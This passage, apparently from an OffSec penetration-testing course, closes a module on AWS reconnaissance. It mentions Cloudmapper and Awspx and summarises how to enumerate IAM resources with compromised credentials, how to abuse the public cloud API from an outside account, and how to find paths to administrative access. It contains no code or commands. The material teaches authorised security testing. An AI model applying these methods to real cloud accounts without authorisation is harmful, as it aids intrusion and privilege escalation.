Automated tools can help manage this data. They are typically designed to present the data in a more organized and visual manner, making it easier to understand the details. For example, Cloudmapper provides visual representations of AWS configurations, helping identify potential issues. We also mentioned Awspx which is useful for analyzing how IAM resources interlink. The selection of a particular tool often depends on the type of assessment and the desired outcomes.
24.6. Wrapping Up
AWS reconnaissance is an important stage that lets us gather information from the target. By interacting with publicly available services and resources, we learn about the service provider and cloud resources the target uses. We also explored some examples in AWS about how to abuse the public CSP API to gather information about the target from an external account.
Using the information from reconnaissance, we can identify potential weaknesses in the target's infrastructure and services. This analysis allows us to tailor our attack vectors and devise social engineering tactics aimed at infiltrating the target's systems more effectively and efficiently.
In this module, we discussed AWS reconnaissance methods that often follow an initial compromise of a public cloud environment. We focused on collecting important information about the scope of access we gained in the environment. Occasionally, we can determine the level of authorization by directly querying for that information with the compromised credentials. However, if we lack permissions to access this data, we must resort to guesswork or use an automated tool that scopes the level of access through brute force, though this approach is not advisable if our goal is to remain undetected.
We then enumerated additional IAM resources in the compromised account and discussed the differences between manual and automated enumeration. To conclude, we analyzed the information gathered to identify potential paths for gaining administrative access in the compromised environment.
© 2024 OffSec